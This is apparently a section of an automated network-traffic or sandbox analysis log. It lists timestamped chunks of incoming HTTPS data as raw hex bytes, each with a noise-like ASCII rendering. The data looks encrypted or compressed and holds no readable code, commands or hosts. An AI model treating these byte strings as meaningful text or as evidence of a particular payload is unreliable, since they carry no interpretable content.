                                                                                                                  2023-08-29 17:16:42 UTC1084INData Raw: bf 34 43 99 4a 5d 24 d0 a7 18 ad 4b d6 a3 26 25 1b 26 01 b3 7e be 25 d0 47 6e 08 cb b6 a3 26 da 30 fd 36 a2 a4 b8 25 d0 b9 86 12 0e 16 a2 26 55 2c 83 c9 0d 74 45 24 d0 40 82 68 25 f0 a2 26 ff c3 e2 af 07 54 57 24 d0 3e f5 6a a3 5c a5 26 86 13 6f ec c7 3a 44 24 d0 9f 6a c9 bb 3b a5 26 8b dc 41 b9 d9 5f b4 25 d0 de ab 1d 24 a1 a5 26 a6 07 54 14 2b e2 9c 25 d0 73 bf 91 f3 08 a4 26 22 d6 58 e9 f1 9f 92 25 d0 4f 57 09 c4 f2 a4 26 a1 1a b1 6e c1 66 ae 25 d0 fe de c3 31 67 a7 26 02 f4 d0 bb 82 a1 b0 25 d0 c7 f8 0a 7c d5 a7 26 bb 5c 74 b6 cf 06 57 24 d0 57 fe 5b 45 45 a6 26 c0 cd a9 46 4c 8f bd 25 d0 30 8c cb 13 37 a6 26 22 3c 9e 0d 5f e3 53 24 d0 01 3e ae b2 a2 a6 26 2c 6d 65 61 c1 2b a4 25 d0 79 6b 02 81 6a b9 26 10 ba 88 68 2c 34 60 24 d0 ac c5 76 8c 29 b9 26
                                                                                                                  Data Ascii: 4CJ]$K&%&~%Gn&06%&U,tE$@h%&TW$>j\&o:D$j;&A_%$&T+%s&"X%OW&nf%1g&%|&\tW$W[EE&FL%07&"<_S$>&,mea+%ykj&h,4`$v)&
                                                                                                                  2023-08-29 17:16:42 UTC1088INData Raw: 2a 57 fa 20 79 49 11 56 ac e4 a3 15 7a 8a 61 b5 03 81 ee 25 79 49 fa 38 f4 d6 e2 15 7a 9d 5e 29 ba 1d c3 32 79 49 84 23 74 de 25 16 7a 1f ff d9 9f c9 00 29 79 49 f7 39 3e dd 64 16 7a ec 83 35 75 ca b5 12 79 49 b6 cd e7 de a7 16 7a 90 d3 2d 24 09 9a 2f 79 49 1c 3f f3 e9 e6 16 7a ef 05 e0 e0 db 8f 11 79 49 b9 1c 89 e6 59 17 7a e8 0d dd a2 78 04 2a 79 49 fb e3 b3 8d 98 17 7a cd b1 fe 24 53 4c 32 79 49 38 61 00 a9 db 17 7a d4 50 45 ed c1 ed 02 79 49 c8 0f 88 48 1d 18 7a b0 cf 17 4c fe fa 01 79 49 d9 ba e4 60 5c 18 7a 06 0d 2e f1 e5 d8 2e 79 49 50 dc 96 1e 9f 18 7a 1e 81 e0 98 2c 30 23 79 49 97 5e 30 c5 de 18 7a b7 bb 44 a2 43 4d 18 79 49 b0 1b de 8e 11 19 7a 9c d6 11 e1 76 90 28 79 49 ff 7d 1d 40 53 19 7a 68 1e 80 0a 7e 20 2c 79 49 e7 ff fa 18 92 19 7a bc 22
                                                                                                                  Data Ascii: *W yIVza%yI8z^)2yI#t%z)yI9>dz5uyIz-$/yI?zyIYzx*yIz$SL2yI8azPEyIHzLyI`\z..yIPz,0#yI^0zDCMyIzv(yI}@Szh~ ,yIz"
                                                                                                                  2023-08-29 17:16:42 UTC1092INData Raw: 45 ea f2 ef cb 9f 27 ac 6b 49 67 3b 7a 4c fb fd d4 e3 19 87 ae 76 89 8e 19 3a 40 d0 75 a2 26 ea 17 39 ba e7 45 41 f2 ef 28 e8 7b aa 04 49 c6 3a 7a 0e e3 e4 62 3a 19 65 af 76 50 02 3c e5 d1 d0 cf a3 26 f5 47 e3 c4 ed 45 16 f3 ef aa 4c 5a 8c 8b 49 2b 3a 7a 81 56 78 d1 3c 19 d5 af 76 cf bd 84 f3 37 d0 92 a0 26 c6 bb 04 df 24 45 ee f0 ef cf ce fe be 87 49 6e 39 7a 02 52 78 62 db 19 96 ac 76 98 23 29 53 47 d0 51 a0 26 ea ee ec 3b f0 45 a8 f1 ef b4 de b0 17 94 49 b5 38 7a cf c3 ad 73 25 19 a7 ad 76 04 cd ba 73 f1 d0 05 a1 26 d0 72 13 21 ee 45 40 f1 ef 61 cc a4 f0 23 49 c9 37 7a 2c 3e f9 29 1e 19 46 a2 76 63 94 05 47 10 d0 1e ae 26 44 e2 b1 73 a1 45 57 fe ef 93 19 19 9a c3 49 f9 36 7a 0f a0 79 8d 75 19 71 a3 76 d5 81 62 03 90 d0 25 af 26 a8 9c 9d 7c 8f 45 57 ff
                                                                                                                  Data Ascii: E'kIg;zLv:@u&9EA({I:zb:evP<&GELZI+:zVx<v7&$EIn9zRxbv#)SGQ&;EI8zs%vs&r!E@a#I7z,>)FvcG&DsEWI6zyuqvb%&|EW
                                                                                                                  2023-08-29 17:16:42 UTC1096INData Raw: bb 75 19 d0 f5 67 75 df 55 96 26 50 9d ba 2e 4d 32 87 35 20 4e 49 83 4c 8d e5 c6 ef 29 8e 39 de 55 44 27 c6 b5 53 d0 75 45 cb 3c 30 7a c5 f8 48 0b 49 75 fc 67 74 19 0c 05 15 99 de 37 a9 26 6e 7a f9 f9 ec 44 b9 0b e8 70 ae 4b 6f a5 76 19 03 c2 9a 85 59 f0 50 24 d0 45 05 37 4e ae 40 f8 ef 45 ae 12 ee 6c 2e c3 c2 78 49 19 04 fd 9a 2a 85 a4 76 59 13 96 f9 b1 cc dd b9 3b 74 45 42 a3 66 d8 a8 26 b8 e7 69 bd 55 1d 2e 32 20 51 26 7e d0 9a af f8 ef ef ca a0 51 45 f3 41 ca 78 49 a5 6e 9d 49 a9 e0 a7 76 62 b6 0d 27 1d d6 b9 b9 1a ec 8c 57 87 a7 45 ab 26 a9 de 7c 6a e3 17 48 e9 c1 59 cd e0 f9 fa ab 26 d0 a9 fe ca b1 7d c3 e4 ec 45 49 15 9f 71 1e 1e 33 7a 09 2d 20 27 1f f1 4b b4 62 8c d0 ed c9 55 33 7a f4 2d 7c 45 b5 8a 90 58 74 19 1c a0 49 c4 90 d7 aa 26 63 1d fe 11
                                                                                                                  Data Ascii: uguU&P.M25 NIL)9UD'SuE<0zHIugt7&nzDpKovYP$E7N@El.xI*vY;tEBf&iU.2 Q&~QEAxInIvb'WE&|jHY&}EIq3z- 'KbU3z-|EXtI&c
                                                                                                                  2023-08-29 17:16:42 UTC1100INData Raw: 60 b8 2a 50 4a 22 19 2f e8 2a dc 6f 86 6b 8d d0 42 7e 11 9d f8 49 39 2f 45 cb bc 45 81 f6 ed 4e 35 59 0a 43 f8 77 99 ff 6c 6c af d0 83 8a a6 8c fa df 9b 60 41 9b 5b 50 0a 9b 73 a8 bc 8b 19 6f 66 7f 51 12 cd 18 22 d0 f8 49 79 a4 47 ba 34 12 45 f6 24 8d 15 8b fa 98 75 48 99 9f 7e 1d 95 b1 84 f6 c8 f0 5e ff ba 06 fd c9 4e d0 63 49 bb 35 d3 89 a6 26 24 64 09 f3 dd 97 52 50 4a 1f 45 db 45 d5 a6 6f 13 2b bc 67 c6 4b 2d 50 72 09 f7 42 d1 41 a7 50 fa cf 66 05 b9 c0 4c 50 22 49 19 88 a0 f3 61 6c fa de 59 11 c2 4a 04 e5 70 c9 16 26 45 b3 92 3c ff f6 5d de af 41 b2 1b 56 88 4e b9 0c fb 47 d0 fc f6 5e 07 dc fb e3 f7 44 89 6e 50 e5 08 8a 04 f2 f6 99 85 ef be a5 28 ab 07 d9 df 45 da b3 ec 0b ff a6 1a 7b 69 07 d3 97 e3 28 10 42 a3 cb d0 02 8f ad 6f f2 06 45 c1 45 8d 5a
                                                                                                                  Data Ascii: `*PJ"/*okB~I9/EEN5YCwll`A[PsofQ"IyG4E$uH~^NcI5&$dRPJEEo+gK-PrBAPfLP"IalYJp&E<]AVNG^DnP(E{i(BoEEZ
                                                                                                                  2023-08-29 17:16:42 UTC1104INData Raw: b7 4f 0d d0 05 b7 27 d5 25 25 8a a2 47 fd eb c3 4d 5f d9 2f 7b 68 59 5e aa a1 75 a3 74 bb 1b dc 45 e9 19 ef ee 85 21 11 8a 4d 0e d6 b4 49 e7 dc 05 48 26 90 cf 59 39 06 54 24 eb df 63 49 17 d0 47 76 94 68 10 3d 11 52 14 6d e8 d0 1d 46 d9 d2 c5 76 49 b9 07 c7 62 8e b7 4e 19 48 55 c9 1a ef 02 3f ce c0 72 b0 8f e2 b4 49 fd c1 05 49 1d ef 34 e7 75 31 b3 24 1b fb b4 49 1b c3 a5 4d 26 f1 05 ed 37 ba 72 b0 36 21 45 2d 19 c4 e5 4c 26 02 55 05 39 d4 f8 c7 eb d3 91 5c 79 d6 7a 09 f2 bd b9 ab ce d9 b7 4b 49 d0 52 69 1e ef 70 06 06 b4 4d 6c 80 d9 b4 49 8f c8 85 4e 19 ef a6 c1 6b 20 b1 b2 f4 d2 79 b9 19 f8 5f c9 11 ef 6f 69 d3 98 22 28 b9 22 43 8f 02 d0 05 40 26 7b 06 f3 85 ce 47 85 eb cd 37 54 19 da 7a 92 59 25 36 c8 ca 3b 04 b8 19 fa 45 56 d9 da 7a db 03 97 11 4d 70
                                                                                                                  Data Ascii: O'%%GM_/{hY^utE!MIH&Y9T$cIGvh=RmFvIbNHU?rII4u1$IM&7r6!E-L&U9\yzKIRipMlINk y_oi"("C@&{G7TzY%6;EVzMp
                                                                                                                  2023-08-29 17:16:42 UTC1108INData Raw: 79 76 bf 62 0a 87 48 22 7a ed ed 24 fb 1c d8 5a 79 94 65 32 20 0c 72 22 7a 90 f0 90 dc 7a a4 52 79 c8 7a 25 a4 96 9d 22 7a 34 14 ef c9 73 55 4a f9 a8 c7 cf b0 d4 87 22 7a 1c 0b 7d ea a1 0b 56 79 d9 c0 0a 95 36 a1 22 7a ea 03 e8 93 95 13 91 f9 42 1a 34 e3 cc cb 22 7a 9d 58 0b 11 0e 1b 40 79 1f 36 ee ec e6 f5 22 7a ca 3a 05 00 46 d3 a1 79 5c ae e1 4f b7 1f 23 7a ad 9b e1 97 23 ed 56 79 78 c1 9c b9 39 38 23 7a 35 1d c8 cb ae 85 5a 79 b6 0f b4 f7 41 25 23 7a ec 40 e6 c1 68 3e 43 79 b8 86 42 1a 8c 4f 23 7a 61 5f 9e 19 a7 45 5b f9 82 b0 ea 72 ee 68 23 7a a8 f3 92 fa a3 23 46 f9 2f c1 d5 28 e7 95 23 7a f5 1d 49 79 c4 8c 4e f9 be 86 35 71 92 be 23 7a ab ec b1 93 7f fd a5 f9 ac b1 c3 86 64 da 23 7a 8a 30 8d 72 b1 e6 4e f9 6b 2d c2 09 ef c7 23 7a f2 87 20 54 40 c3
                                                                                                                  Data Ascii: yvbH"z$Zye2 r"zzRyz%"z4sUJ"z}Vy6"zB4"zX@y6"z:Fy\O#z#Vyx98#z5ZyA%#z@h>CyBO#za_E[rh#z#F/(#zIyN5q#zd#z0rNk-#z T@
                                                                                                                  2023-08-29 17:16:42 UTC1112INData Raw: fc 7e 19 24 ab 02 99 6f f0 eb 88 d0 82 da f0 10 7b fb 04 4a 45 d8 db 50 35 76 17 8b 2f 49 2a 72 0d e3 a7 88 c6 6f 19 da 06 ed 4c 6f a1 31 c0 d0 9a 56 af 44 7b 11 63 a6 45 9e 1f c8 06 76 19 d0 af 49 33 38 fe 80 a6 b1 af 6a 59 a7 2c 6a 23 6d 45 4d 19 2f 85 df 6e 0f 07 af cf d0 7b 48 19 d2 b5 4b 17 28 ba b6 e6 1e 42 09 e6 69 3d 55 3a 6f 40 07 9b 90 34 18 bc 30 b5 46 1d f7 45 49 19 6c 09 42 60 41 24 bf 19 6e 83 0f 93 54 85 53 bb d0 fa b3 2c b4 f4 a5 ca 31 45 77 2b 78 5f 63 f3 a1 d9 49 26 3f dc 9b e4 ca 98 80 19 6e ea f3 94 ef 26 7a 60 d0 fa a3 df 4f 75 9f 0c 64 45 77 68 d4 a3 f7 a3 53 2e 49 26 47 e3 e9 8d c1 eb d4 19 6e f6 2e 45 ee 3e 99 56 d0 fa 77 27 5f df 3c a4 56 45 77 bd 67 fb ed a8 ce 78 49 26 d0 85 86 30 1e 0c 8c 19 6f 1d da 0c 6f 76 32 20 51 c3 1e 75
                                                                                                                  Data Ascii: ~$o{JEP5v/I*roLo1VD{cEvI38jY,j#mEM/n{HK(Bi=U:o@40FEIlB`A$nTS,1Ew+x_cI&?n&z`OudEwhS.I&Gn.E>Vw'_<VEwgxI&0oov2 Qu
                                                                                                                  2023-08-29 17:16:42 UTC1116INData Raw: af 76 03 54 e7 07 01 3a 9d 7b ed d2 37 48 21 9f 46 49 f2 ef d2 3b 0e 34 64 6e 13 d9 b1 4b eb a2 4f d8 6b 3b 7a c9 ef 5c a8 71 62 9b 59 bd 1b d1 37 48 f5 a0 9b a2 26 e9 d0 e9 a3 bc bb 70 3d 24 47 ba eb de 45 43 5e 3c 7a 95 78 ba 4c 5d f1 b9 31 5f 99 a2 44 1d 65 7c 45 a5 26 f7 19 52 eb ac 66 4c 6c c6 b1 bb 21 32 4b a4 26 1e 25 34 ab b4 2f c1 ec db 37 48 d5 d0 12 27 f4 ef 92 c1 0a 9d 51 1f 61 a5 55 bc 68 d1 69 b1 d3 d0 a8 76 28 5d 5c 71 76 ca 43 65 ed d2 37 48 5d 0d 61 a7 26 90 4c 2a a4 ff ff 43 ec f0 b3 48 6b e1 65 35 f7 ef d1 bc 61 e0 72 35 b1 e1 b1 4b 6b d1 39 90 19 00 ab 76 05 06 9c 57 20 c4 4d 5b ed d2 b2 38 18 a0 65 6a 19 3f 7a c5 50 91 c8 c2 6c d6 78 bd 1b a2 44 99 12 a3 aa 76 99 58 3d 49 c0 64 4a 7d ed d2 47 b1 eb d2 f4 89 f6 ef 20 2d 49 b6 fa 6f d0
                                                                                                                  Data Ascii: vT:{7H!FI;4dnKOk;z\qbY7H&p=$GEC^<zxL]1_De|E&RfLl!2K&%4/7H'QaUhiv(]\qvCe7H]a&L*CHke5ar5Kk9vW M[8ej?zPlxDvX=IdJ}G -Io
                                                                                                                  2023-08-29 17:16:42 UTC1120INData Raw: 4c a9 1d 98 5e 31 09 b0 45 2c 10 b1 41 9e 68 d9 ac 4f 18 d0 29 a9 1d 90 a5 4f fc d1 af 4a 79 d0 15 a9 18 b0 a9 40 f8 d4 a4 45 ce 3d 4c 20 1e d1 45 dd f9 d4 d5 21 1b b1 55 b3 b9 30 44 e1 7d d2 a4 4a e8 f5 2c 4f 18 d0 ef e5 f9 d4 9d a5 11 38 a5 48 e9 b4 47 66 f8 d3 b4 41 70 d6 44 49 d5 30 41 69 50 25 2e 6c 29 30 44 75 79 d0 20 52 78 d4 34 6c b2 39 43 a8 1a b8 a5 48 69 b4 47 bd ed df 43 11 71 d6 44 49 15 f4 59 31 b9 25 a9 46 a9 30 44 f5 71 d9 24 4d e8 df ac 4f 4c d1 45 6d f9 d4 a9 25 10 2c a5 48 11 ae 0f 2e 10 b1 41 38 10 39 43 2b 1b 30 41 71 f2 30 43 20 10 98 a5 48 4d b8 4c 28 1d a1 4c 1e f0 d6 87 cc f9 d4 c1 25 10 44 a5 48 b9 6f 2d 40 78 d4 34 40 f0 d6 07 cf f9 d4 95 25 10 2a a5 a9 18 3c 25 49 fc e5 24 4d 68 d9 ac 4f 1d 3d c9 49 a5 30 45 49 05 33 45 49 19
                                                                                                                  Data Ascii: L^1E,AhO)OJy@E=L E!U0D}J,O8HGfApDI0AiP%.l)0Duy Rx4l9CHiGCqDIY1%F0Dq$MOLEm%,H.A89C+0Aq0C HML(L%DHo-@x4@%*<%I$MhO=I0EI3EI
                                                                                                                  2023-08-29 17:16:42 UTC1124INData Raw: 43 49 8d 85 75 49 b9 e0 45 91 29 d0 31 79 19 ca 10 79 1b a4 75 49 9b a0 46 e6 e9 d3 c2 48 69 d0 c4 3f 1b d0 e2 3e 1b 9c 45 58 69 d0 74 49 fc a8 72 49 47 52 3e 39 19 96 45 49 bd 5a 15 77 09 af 47 49 f2 61 46 5e 1a d0 e5 0d 09 d0 45 9a 29 d0 7e 79 19 7a 4f 79 19 49 75 49 4d a0 47 46 29 d0 6f e4 e9 d1 bf 39 1b 09 35 49 1d c8 ed 4a 19 e9 f5 41 d7 20 45 11 69 d0 8f 3a 69 d2 6b 79 1b 8f 00 b9 1d a0 45 4b ae a0 45 b4 c5 d3 45 50 c4 f8 46 49 7e 20 45 f3 29 d0 59 97 11 d3 45 f2 a9 d2 2d 01 19 d0 4f 29 29 d0 37 79 19 f3 da 48 19 d0 c5 75 1c d0 95 74 1c d0 45 69 26 d5 45 43 59 d5 45 cb 79 e0 45 3b 58 d5 45 f5 29 d0 65 53 5b d5 45 d9 29 d0 a5 0a 19 d5 45 79 5c d5 45 89 5e 98 40 49 71 a0 44 f9 51 e0 45 00 51 d5 45 30 a9 d0 36 b6 2a d0 15 49 94 d2 45 0a 97 d2 45 d9 1c
                                                                                                                  Data Ascii: CIuIE)1yyuIFHi?>EXitIrIGR>9EIZwGIaF^E)~yzOyIuIMGF)o95IJA Ei:ikyEKEEPFI~ E)YE-O))7yHutEi&ECYEyE;XE)eS[E)Ey\E^@IqDQEQE06*IEE
                                                                                                                  2023-08-29 17:16:42 UTC1128INData Raw: 47 49 f4 ed 45 bb a4 d0 45 9d 58 d2 45 7d 5d d2 45 49 a2 96 47 49 04 ef 45 09 19 6a ca 4d 19 1d 45 51 ee d0 d5 4d 19 cb d4 4d 19 24 45 c7 1d d0 e4 16 1b d0 a9 49 78 d2 45 7c 7b d2 45 e4 19 b0 47 49 aa 6a 46 49 2f d0 fe 4a 19 1c 72 40 19 00 40 49 1f 18 45 4f ec 6c 46 49 0a c0 f8 4a 19 af 45 0f d0 87 46 49 19 16 13 4a 19 b8 1a 4a 59 d0 6b f7 1a d0 b1 49 27 e9 04 49 8f ff d2 4d 19 55 45 4f 76 d5 45 4f 5c d0 43 22 d8 d3 45 f9 0c d0 46 e2 19 e3 9f 49 1a 21 a6 48 59 d0 4d 2a 1b d0 f7 49 02 36 44 49 1a ed 80 4a 19 f9 87 4a 1d d0 12 49 1e 3a 25 4a 19 ca 45 28 1a d0 bc b1 1b d0 0d 19 e0 d2 45 ed 19 d3 b7 49 1a 9e 65 b3 1b d0 52 b2 19 4b b8 4b 1d d0 09 49 1a e1 8c 4a 19 ab 40 49 1a 21 45 0e 44 b7 47 49 3a d0 2e 4b 19 a7 2b 4b 19 e7 45 66 1c d0 38 67 1c d0 ba 4c 19
                                                                                                                  Data Ascii: GIEEXE}]EIGIEjMEQMM$EIxE|{EGIjFI/Jr@@IEOlFIJEFIJJYkI'IMUEOvEO\C"EFI!HYM*I6DIJJI:%JE(EIeRKKIJ@I!EDGI:.K+KEf8gL
                                                                                                                  2023-08-29 17:16:42 UTC1132INData Raw: 45 38 4c 10 45 34 d9 d0 ce 89 19 46 85 49 ba 85 85 49 a9 10 45 f6 d9 d0 8f 89 19 3c 40 89 19 07 85 49 19 09 4d 49 08 85 85 49 3c 10 45 7a d9 d0 07 89 19 80 10 89 19 8b 85 49 72 10 45 3f d9 d0 d0 1c d9 d0 eb 89 19 11 85 49 c3 10 45 b9 40 10 45 4a c3 10 48 89 19 c9 85 49 3b 85 85 49 36 10 45 71 d9 d0 04 89 19 9d 10 89 19 84 85 49 47 10 45 23 d9 d0 3d 1c d9 d0 c1 89 19 40 85 49 87 10 45 ee 4c 10 45 fb d9 d0 f8 89 19 1a 85 49 cc 85 85 49 fb 10 45 a6 d9 d0 bb 89 19 d8 15 92 11 d0 51 89 19 f0 85 49 37 85 85 49 2c 10 45 77 d9 d0 03 89 19 9f 10 89 19 88 85 49 7b 10 45 23 d9 d0 36 1c d9 d0 39 89 19 56 85 49 88 10 45 d7 4c 10 45 e0 d9 d0 f1 89 19 11 85 49 d7 85 85 49 c1 10 45 ad d9 d0 a9 89 19 27 20 89 19 2f 85 49 13 0c 85 51 d9 d0 5a 1c d9 d0 6f 89 19 e3 85 49 27
                                                                                                                  Data Ascii: E8LE4FIIE<@IMII<EzIrE?IE@EJHI;I6EqIGE#=@IELEIIEQI7I,EwI{E#69VIELEIIE' /IQZoI'
                                                                                                                  2023-08-29 17:16:42 UTC1136INData Raw: e7 4a ba d3 e1 4a bc d0 46 ef 1a 77 46 e1 1a 79 45 4a b3 d3 ee 4a b5 d3 e8 49 1a 7e 46 e6 1a 60 46 f8 19 d3 f7 4a aa d3 f1 4a ac d0 46 ff 1a 67 46 f1 1a 69 45 4a a3 d3 fe 4a a5 d3 f8 49 1a 6e 46 f6 1a 10 46 88 19 d3 87 4a da d3 81 4a dc d0 46 8f 1a 17 46 81 1a 19 45 4a d3 d3 8e 4a d5 d3 88 49 1a 1e 46 86 1a 00 46 98 19 d3 97 4a ca d3 91 4a cc d0 46 9f 1a 07 46 91 1a 09 45 4a c3 d3 9e 4a c5 d3 98 49 1a 0e 46 96 1a 30 46 a8 19 d3 a7 4a fa d3 a1 4a fc d0 46 af 1a 37 46 a1 1a 39 45 4a f3 d3 ae 4a f5 d3 a8 49 1a 3e 46 a6 1a 20 46 b8 19 d3 b7 4a ea d3 b1 4a ec d0 46 bf 1a 27 46 b1 1a 29 45 4a e3 d3 be 4a e5 d3 b8 49 1a 2e 46 b6 1a d0 41 48 19 d4 47 4d 1a d4 41 4d 1c d0 41 4f 1d d7 41 41 1d d9 45 4d 13 d4 4e 4d 15 d4 48 49 1d de 41 46 1d c0 41 58 19 d4 57 4d 0a
                                                                                                                  Data Ascii: JJFwFyEJJI~F`FJJFgFiEJJInFFJJFFEJJIFFJJFFEJJIF0FJJF7F9EJJI>F FJJF'F)EJJI.FAHGMAMAOAAEMNMHIAFAXWM
                                                                                                                  2023-08-29 17:16:42 UTC1140INData Raw: 4f 51 6e d4 5c 69 70 bc 27 3c 7f d2 42 2c 75 f0 20 27 7e a4 2d c0 1c b9 73 cf 2d d3 42 c8 93 b6 2c 27 7d 52 05 c8 1a d5 23 20 6b a3 31 7a 19 5e 6a 41 1f 54 52 cd 1e dc 43 20 1c c6 2b 2c 67 a8 43 55 9a d5 c3 52 18 d7 ce 4c 9c ca 2c 3b 6d 51 7e 25 6a 53 13 c8 6a d3 c1 24 1d bf 21 48 15 a0 26 25 78 a3 84 48 9c a0 2c 2c 7c b5 45 59 18 5f 65 39 6b b5 36 2c 1a d4 2c 27 e1 a4 23 16 98 c7 41 4c 19 6a 43 4c 90 db bf 3a 1a d3 30 4c 57 90 47 40 57 52 46 0a 1f a0 37 2c 78 b4 42 4f 51 d3 07 2d 6b 0b 45 68 19 d3 24 08 98 d1 46 28 9d d1 40 4e da 90 77 49 1b a3 26 28 77 53 60 0a 1b 31 06 56 6a b5 20 22 5e c6 04 4a da 97 82 0d 1b 58 43 cd 64 a3 31 28 1a 84 46 4b 16 94 4e 89 1b d8 47 8a 48 a4 20 25 75 cf 82 46 58 d3 46 42 5d d2 cd 4f 70 bd 20 36 5a dc 47 4b 9b fd c4 4b 5a
                                                                                                                  Data Ascii: OQn\ip'<B,u '~-s-B,'}R# k1z^jATRC +,gCURL,;mQ~%jSj$!H&%xH,,|EY_e9k6,,'#ALjCL:0LWG@WRF7,xBOQ-kEh$F(@NwI&(wS`1Vj "^JXCd1(FKNGH %uFXFB]Op 6ZGKKZ
                                                                                                                  2023-08-29 17:16:42 UTC1144INData Raw: 3c 89 09 90 44 26 2b a7 e5 c4 70 a3 47 5d f8 d0 30 27 8f b3 a4 49 19 b6 26 a8 1a a5 35 c9 90 8d a5 49 6e b5 4e 49 18 53 4e 3e f9 96 2c e7 70 d1 44 8c 15 36 55 3e 1c de 32 6c 17 ae 32 ac 15 f3 64 4b 18 f4 48 28 6a 92 48 3e 34 b6 48 31 fc d7 41 48 75 71 06 25 7d 9d a4 67 75 11 03 ea 9c b3 2a 09 3d bc 61 26 7e b1 45 78 29 70 45 27 7e 5a 2f 49 bb bd 86 19 74 b2 29 89 2f a8 28 2b 6b 14 45 0b 4d b0 a8 4b 18 a3 7a 6e 18 f0 6f 29 18 56 47 2e 1b d3 43 2c 74 e8 26 21 6b 12 45 08 12 10 45 39 60 23 81 49 98 d4 20 24 bb 80 31 49 0a d1 65 69 0b d0 25 61 7f d0 11 11 69 bf 32 b7 19 a4 65 1f 39 c2 6d 08 19 c1 59 cb 31 a3 6d 3a 4b d0 74 48 68 a3 e4 73 4b d0 a5 4b 6b 54 24 20 69 e1 37 28 77 b4 07 49 84 c1 44 2c 4a de f1 11 8d 88 37 2c c9 b3 d9 2d 19 73 60 cc 3c 20 4d 2b 6c
                                                                                                                  Data Ascii: <D&+pG]0'I&5InNISN>,pD6U>2l2dKH(jH>4H1AHuq%}gu*=a&~Ex)pE'~Z/It)/(+kEMKzno)VG.C,t&!kEE9`#I $1Iei%ai2e9mY1m:KtHhsKKkT$ i7(wID,J7,-s`< M+l
                                                                                                                  2023-08-29 17:16:42 UTC1148INData Raw: 2b 1c 79 d0 cf 29 19 4a 25 49 b7 b0 45 f7 4c b0 45 97 79 d0 a6 29 19 2d 25 49 1b 80 c9 51 61 f2 25 49 2f b0 45 07 4c b0 45 2b 79 d0 c7 29 19 57 25 49 b8 85 25 49 bf b0 45 8f 79 d0 9f 29 19 22 1c 29 19 d6 c8 29 14 b0 45 62 79 d0 00 1c 79 d0 0f 29 19 ba 25 49 67 b0 45 df 4c b0 45 e3 79 d0 8f 29 19 1f 25 49 f0 b5 25 49 f7 b0 45 47 97 b0 49 29 19 ea 10 29 19 9e 25 49 77 b0 45 3a 79 d0 c8 1c 79 d0 d7 29 19 62 25 49 df b0 45 97 1c b0 45 bb 79 d0 57 c6 01 a8 52 1c 79 d0 74 29 19 e6 75 49 4f e0 45 23 94 e0 45 cb 29 d0 a4 5c 03 50 46 79 19 40 42 49 43 52 75 49 93 d2 f5 49 b9 d2 95 49 99 d4 35 49 1d a0 45 e1 18 d0 55 b9 18 c0 b5 48 49 20 44 1b 49 20 44 59 99 e1 45 4d 2d d0 4d cd c9 ee 37 63 11 d0 3b 0a 29 d0 77 02 84 cc 4d c9 ea d1 40 49 1e d0 e1 2b 9b 2a 2f 49 0f
                                                                                                                  Data Ascii: +y)J%IELEy)-%IQa%I/ELE+y)W%I%IEy)"))Ebyy)%IgELEy)%I%IEGI))%IwE:yy)b%IEEyWRyt)uIOE#E)\PFy@BICRuIII5IEUHI DI DYEM-M7c;)wM@I+*/I
                                                                                                                  2023-08-29 17:16:42 UTC1152INData Raw: f9 7b 2f e3 79 7a 34 e5 7f 7c 5f e6 d5 7f 87 e6 89 7f f7 e6 05 7e 5f e7 2c 7e 76 e7 d1 7e b9 e7 96 7e e0 e7 76 71 61 e8 0e 73 4f ea 1b 73 60 ea 58 72 31 eb 28 72 9a eb 97 72 3e ec 2b 75 b1 ec 1c 74 46 ed 35 74 9d ed e0 74 b2 ed 98 74 2d ee 79 77 65 ee c3 77 b7 ee 82 77 11 ef 7d 76 53 ef d9 76 bb ef 81 76 fb ef 45 49 19 a0 45 49 71 d0 45 49 1d e0 76 79 22 e0 15 79 42 e0 07 7a 65 e3 d6 7a e3 e4 4e 7c 5c e5 17 7c 45 e5 2f 7c 6a e5 38 7c ab e5 ff 7c dd e5 98 7c fe e5 bf 7c 05 e6 16 7f 91 e6 de 7f 12 e7 6d 7e 69 e7 97 7e 34 e8 e7 71 b7 e8 84 71 ca e8 ab 71 ef e8 bb 71 0c e9 6b 70 53 e9 16 70 40 e9 27 70 7e e9 33 70 84 e9 45 49 19 50 45 49 81 d0 45 49 1c e1 c4 78 85 e1 43 7b 3d e2 ce 7b 8e e2 86 7b f0 e2 64 7a 33 e3 3b 7a d3 e3 b5 7a a8 e4 53 7c 68 e5 80 7c 0c
                                                                                                                  Data Ascii: {/yz4|_~_,~v~~vqasOs`Xr1(rr>+utF5ttt-yweww}vSvvEIEIqEIvy"yBzezN|\|E/|j8||||m~i~4qqqqkpSp@'p~3pEIPEIEIxC{={{dz3;zzS|h|
                                                                                                                  2023-08-29 17:16:42 UTC1156INData Raw: 00 76 67 ef cf 76 ee ef 45 89 1b d0 d1 49 19 d0 52 79 35 e0 0b 79 4c e0 2e 79 9d e0 ce 79 8b e0 9b 79 fa e0 b2 79 03 e1 16 78 7d e1 d0 78 b7 e1 8d 7b 64 e3 c0 7a a9 e3 83 7a e3 e4 6f 7c 8a e5 99 7c ec e5 40 7f 96 e6 9f 7f e3 e6 42 7e 74 e7 da 7e 2b e8 8c 71 07 e9 35 70 e5 e9 14 73 b8 ea 3e 72 8e eb a1 72 3f ec 24 75 b4 ec f8 75 fa ec 5e 74 3d ed 7c 74 48 ed 27 74 60 ed c7 74 d7 ed b9 74 1a ee 65 77 4c ee ea 77 da ee 8f 77 5a ef 0b 76 7f ef 2b 76 a3 ef 8f 76 19 d0 45 99 1b d0 81 49 19 d0 5c 79 4b e0 3c 79 91 e0 85 79 c8 e0 ad 79 1d e1 7c 78 b4 e1 bc 78 09 e2 39 7b 8a e2 98 7b e9 e2 b3 7b 07 e3 db 7a 03 e4 2b 7d 93 e4 b4 7d 52 e5 ce 7c c4 e5 6c 7f 6e e6 39 7f b4 e6 88 7f 66 e7 d3 7e c8 e7 ab 7e 1f e8 56 71 65 e8 da 71 f1 e9 bb 70 08 ea 01 73 54 ea 3b 73 9e
                                                                                                                  Data Ascii: vgvEIRy5yL.yyyyx}x{dzzo||@B~t~+q5ps>rr?$uu^t=|tH't`ttewLwwZv+vvEI\yK<yyy|xx9{{{z+}}R|ln9f~~VqeqpsT;s
